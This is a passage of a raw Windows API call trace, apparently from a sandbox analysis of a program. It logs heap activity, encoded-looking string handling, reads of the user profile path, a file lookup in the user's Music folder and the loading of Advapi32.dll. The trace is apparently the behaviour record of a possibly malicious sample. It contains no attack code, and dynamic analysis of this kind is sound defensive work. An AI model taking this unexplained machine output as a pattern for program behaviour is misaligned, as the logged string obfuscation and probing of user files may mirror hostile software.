(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0253.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b34c8 | out: hHeap=0x25c0000) returned 1 [0253.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0253.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0253.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0253.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0253.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0253.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0253.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0253.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0253.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0253.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0253.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0253.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0253.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0253.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0253.907] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0253.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0253.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0253.907] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0253.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0253.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0253.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0253.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2dd8 [0253.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0253.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0253.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0253.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0253.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0253.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0253.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0253.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0253.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0253.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0253.909] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0253.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0253.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0253.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2e0 [0253.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0253.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0253.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa928 [0253.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0253.909] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0253.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0253.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0253.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0253.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0253.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0253.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0253.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0253.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0253.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0253.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0253.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0253.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0253.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0253.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0253.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0253.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0253.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x24207f0 [0253.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0253.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0253.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0253.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0253.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0253.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0253.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0253.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0253.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0253.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0253.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0253.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1938 [0253.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0253.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0253.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0253.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0253.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0253.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0253.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0253.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0253.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0253.912] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0253.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0253.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0253.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa670 [0253.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0253.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0253.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa928 [0253.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0253.913] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0253.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0253.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0253.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0253.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0253.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0253.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0253.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0253.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0253.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0253.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0253.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0253.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0253.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0253.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0253.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0253.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0253.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x2420888 [0253.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0253.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0253.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0253.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0253.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0253.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0253.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0253.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0253.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0253.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2d28 [0253.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0253.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0253.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0253.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0253.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1758 [0253.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0253.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0253.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0253.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2e0 [0253.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0253.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0253.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0253.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0253.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0253.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0253.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0253.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0253.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0253.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0253.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0253.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0253.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0253.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0253.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0253.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0253.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0253.917] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0253.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0253.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0253.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0253.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0253.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0253.917] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0253.917] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.917] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0253.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0253.917] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0253.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0253.917] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0253.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0253.918] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0253.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0253.918] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xBQp6dTr52cBE6l-Un.m4a", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33778d30, ftCreationTime.dwHighDateTime=0x1d4c59c, ftLastAccessTime.dwLowDateTime=0x5cdbd2b0, ftLastAccessTime.dwHighDateTime=0x1d4d41c, ftLastWriteTime.dwLowDateTime=0x5cdbd2b0, ftLastWriteTime.dwHighDateTime=0x1d4d41c, nFileSizeHigh=0x0, nFileSizeLow=0x16f0, dwReserved0=0x4d0530, dwReserved1=0xeaba, cFileName="xBQp6dTr52cBE6l-Un.m4a", cAlternateFileName="XBQP6D~1.M4A")) returned 0xaa5660 [0253.918] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0253.918] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0253.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0253.918] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0253.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0253.918] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0253.919] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0253.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0253.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0253.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0253.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0253.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0253.919] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0253.919] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.919] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0253.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0253.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0253.919] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0253.919] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0253.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0253.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0253.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0253.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0253.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0253.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0253.920] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0253.920] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0253.920] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0253.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0253.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0253.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0253.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0253.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0253.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0253.920] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0253.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0253.920] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0253.921] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0253.921] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0253.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0253.921] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0253.921] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0253.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0253.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0253.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0253.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0253.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0253.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0253.925] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0253.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0253.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0253.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0253.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0253.925] HeapFree (in: hHeap=0x25c0000, 